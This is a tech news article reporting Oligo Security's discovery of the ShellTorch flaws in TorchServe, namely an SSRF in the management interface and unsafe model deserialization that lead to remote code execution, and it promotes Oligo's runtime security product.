Large language models and AI models are growing in popularity every day. Even preventing accidents, detecting cancer, and maintaining public safety, we must rely on these AI apps to provide the finest information. Armed forces and weapons are also utilizing AI in international confrontations.
Machine learning (ML) research has been largely driven by PyTorch, which stands out as a leading AI platform. Although PyTorch is widely used in studies—over 90% of ML research publications use it—its prominence makes it a tempting target for potential attackers looking to infiltrate AI-based systems. Notably, PyTorch has a wide range of customers, including some of the biggest businesses in the world, including Walmart, Amazon, OpenAI, Tesla, Azure, Google Cloud, Intel, and others.
However, Oligo Security mistakenly discovered that TorchServe’s default configuration could be compromised. Oligo found a brand-new critical SSRF weakness in the administration interface that allowed configuration uploads from any domain and allowed for remote code execution (RCE). An attacker can run code and take control of the target server by taking advantage of ShellTorch.
They noticed that TorchServe is vulnerable to unsafe deserialization of a malicious model, which could allow remote code execution. This combination of vulnerabilities could lead to Remote Code Execution (RCE) and a complete takeover, especially given the substantial number of TorchServe applications, with tens of thousands of instances being exposed to these risks. They observed that many openly available, unprotected instances are vulnerable to hacking, the introduction of malicious AI models, and even a full server takeover. They emphasized that it may affect millions of people. The world’s servers can be compromised due to these flaws. Therefore, some of the biggest businesses in the world may be immediately in danger.
Consequently, the researchers developed a security product to detect threats within a runtime environment. Unlike other tools that may miss certain causes of undesirable or unsafe application behavior, Oligo investigates the dynamic environment where libraries are utilized, identifying issues that might be overlooked. In contrast to static analysis solutions, it also can spot anomalies in any code during runtime. This includes code developed with open-source libraries, proprietary third-party software, or custom code. Oligo also identifies potential risk sources, such as insecure configuration settings. So, it is possible to see, change, steal, and delete AI models and sensitive data going into and out of the target TorchServe server using the high privileges made available by these vulnerabilities.
The researchers emphasized that an additional advantage of Oligo is its ability to offer low-disruption solutions. It doesn’t necessarily require comprehensive patching or version changes when addressing vulnerabilities and security issues, providing a more streamlined approach to enhancing system security.
Check out the Reference Article. All Credit For This Research Goes To the Researchers on This Project. Also, don’t forget to join our 31k+ ML SubReddit, 40k+ Facebook Community, Discord Channel, and Email Newsletter, where we share the latest AI research news, cool AI projects, and more.
If you like our work, you will love our newsletter..
We are also on WhatsApp. Join our AI Channel on Whatsapp..
Rachit Ranjan is a consulting intern at MarktechPost . He is currently pursuing his B.Tech from Indian Institute of Technology(IIT) Patna . He is actively shaping his career in the field of Artificial Intelligence and Data Science and is passionate and dedicated for exploring these fields.